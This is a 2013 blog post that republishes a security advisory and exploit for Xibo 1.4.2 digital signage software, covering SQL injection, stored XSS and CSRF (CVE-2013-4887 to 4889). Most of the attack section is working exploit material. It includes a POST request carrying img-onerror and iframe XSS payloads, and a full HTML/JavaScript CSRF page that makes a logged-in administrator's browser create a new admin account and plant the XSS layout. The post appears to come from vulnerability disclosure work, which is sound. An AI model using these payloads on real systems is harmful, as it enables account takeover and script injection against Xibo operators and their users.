Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory:
# Software: Xibo 1.4.2 -
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889

SQL Injection Vulnerability - CVE-2013-4887

Figure 1 - JSON Error

Figure 2 - Xibo application log containing a SQL error that corresponds to JSON error

Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client side HTML code was modified to reflect the query demonstrated in figure 3

Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

The layout name and description submitted to the layout-add handler are stored without sanitisation and later rendered as raw HTML, giving persistent XSS. The request used:

POST: /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D''+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags

Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

When a logged-in Xibo administrator loads the following HTML page, the browser submits two forged POST requests with the victim's session cookie attached: the first creates an administrative user (username Gimppy, password ISE), the second creates a layout carrying the XSS payloads shown above.

<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
//The form action is left blank as in the advisory; it must point at the target Xibo's user-add handler.
function RF1(){
    document.write('<form name="addAdmin" target="_blank" action="" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads (same fields as the POST to /index.php?p=layout&q=add&ajax=true above)
//The form action is left blank as in the advisory; it must point at the target Xibo's layout-add handler.
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'\' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

//Write both hidden forms into the page
function createPage(){
    RF1();
    RF2();
}

//Submit the forms; the victim's browser attaches the Xibo session cookie automatically
function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage();
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 500);  // 500 ms (not the octal literal 0500)
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
}
</script>
